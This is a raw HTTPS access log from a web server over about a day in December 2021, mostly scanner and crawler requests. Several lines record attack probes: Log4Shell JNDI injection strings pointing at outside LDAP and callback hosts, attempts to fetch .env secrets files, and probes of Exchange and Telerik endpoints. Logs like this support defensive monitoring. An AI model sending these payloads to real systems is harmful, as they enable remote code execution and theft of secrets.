[18/Dec/2021:01:20:08 +0100] 18.237.184.128 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[18/Dec/2021:01:22:21 +0100] 34.215.93.218 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 302
[18/Dec/2021:01:22:33 +0100] 162.142.125.193 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[18/Dec/2021:01:32:40 +0100] 35.86.98.222 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[18/Dec/2021:01:33:01 +0100] 34.211.229.79 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 302
[18/Dec/2021:02:35:08 +0100] 23.90.160.122 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[18/Dec/2021:02:35:08 +0100] 23.90.160.122 TLSv1.2 DHE-RSA-AES256-SHA256 "GET /fuel HTTP/1.1" 304
[18/Dec/2021:04:42:42 +0100] 109.237.103.123 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304
[18/Dec/2021:04:42:43 +0100] 109.237.103.123 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /.env HTTP/1.1" 304
[18/Dec/2021:04:48:56 +0100] 40.77.167.42 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[18/Dec/2021:04:54:11 +0100] 131.220.6.152 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 295
[18/Dec/2021:04:55:09 +0100] 192.241.212.241 TLSv1.2 AES256-SHA "GET /actuator/health HTTP/1.1" 310
[18/Dec/2021:05:18:08 +0100] 92.118.160.5 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 377
[18/Dec/2021:05:32:32 +0100] 193.118.53.202 TLSv1.2 DHE-RSA-AES256-SHA256 "GET /cgi-bin/config.exp HTTP/1.1" 315
[18/Dec/2021:05:59:24 +0100] 36.138.125.72 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 428
[18/Dec/2021:05:59:25 +0100] 36.138.125.72 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[18/Dec/2021:05:59:26 +0100] 36.138.125.72 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /login HTTP/1.1" 388
[18/Dec/2021:05:59:27 +0100] 36.138.125.72 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[18/Dec/2021:07:08:20 +0100] 162.142.125.58 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[18/Dec/2021:07:08:21 +0100] 162.142.125.58 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[18/Dec/2021:07:55:01 +0100] 184.105.247.195 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[18/Dec/2021:08:05:40 +0100] 185.45.192.194 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /?v=%24%7Bjndi%3Aldap%3A%2F%2F86.59.113.102.c6ygt3g2vtc0000gz0d0gdxepneyyyyyb.interact.sh%2Fa9svwls%7D HTTP/1.1" 500
[18/Dec/2021:08:14:05 +0100] 167.94.138.60 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[18/Dec/2021:08:14:06 +0100] 167.94.138.60 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[18/Dec/2021:08:50:03 +0100] 128.1.248.42 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[18/Dec/2021:08:56:24 +0100] 192.241.210.24 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[18/Dec/2021:09:06:57 +0100] 192.241.214.51 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 335
[18/Dec/2021:09:58:00 +0100] 192.241.209.65 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[18/Dec/2021:10:00:32 +0100] 192.241.195.166 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx HTTP/1.1" 314
[18/Dec/2021:10:01:16 +0100] 192.241.200.235 TLSv1.2 AES256-SHA "GET /owa/auth/x.js HTTP/1.1" 310
[18/Dec/2021:11:08:45 +0100] 35.195.93.98 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301
[18/Dec/2021:12:56:35 +0100] 128.1.248.42 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[18/Dec/2021:13:43:53 +0100] 192.241.214.99 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[18/Dec/2021:13:48:08 +0100] 128.14.133.58 TLSv1.2 DHE-RSA-AES256-SHA256 "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 330
[18/Dec/2021:17:22:20 +0100] 185.180.143.79 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[18/Dec/2021:17:43:07 +0100] 172.104.246.207 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST / HTTP/1.1" 301
[18/Dec/2021:18:12:22 +0100] 207.46.13.233 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 311
[18/Dec/2021:18:12:24 +0100] 207.46.13.233 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 311
[18/Dec/2021:18:12:34 +0100] 40.77.167.42 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[18/Dec/2021:18:47:32 +0100] 36.138.125.72 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /${jndi:ldap://31.131.16.127:1389/Exploit} HTTP/1.1" 428
[18/Dec/2021:18:47:33 +0100] 36.138.125.72 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[18/Dec/2021:18:47:34 +0100] 36.138.125.72 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /login HTTP/1.1" 388
[18/Dec/2021:18:47:35 +0100] 36.138.125.72 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[18/Dec/2021:18:50:24 +0100] 128.14.134.170 TLSv1.2 AES256-SHA "GET /remote/login HTTP/1.1" 309
[18/Dec/2021:20:19:14 +0100] 167.248.133.58 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[18/Dec/2021:20:19:14 +0100] 167.248.133.58 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[18/Dec/2021:20:59:16 +0100] 89.248.160.193 TLSv1.2 DHE-RSA-AES256-SHA "GET /admin/public/index.html HTTP/1.1" 406
[18/Dec/2021:23:34:55 +0100] 193.118.53.202 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[19/Dec/2021:00:04:06 +0100] 185.215.164.38 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST / HTTP/1.1" 301
[19/Dec/2021:00:04:07 +0100] 185.215.164.38 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304
[19/Dec/2021:00:37:26 +0100] 103.237.101.15 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[19/Dec/2021:00:37:31 +0100] 103.237.101.15 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 394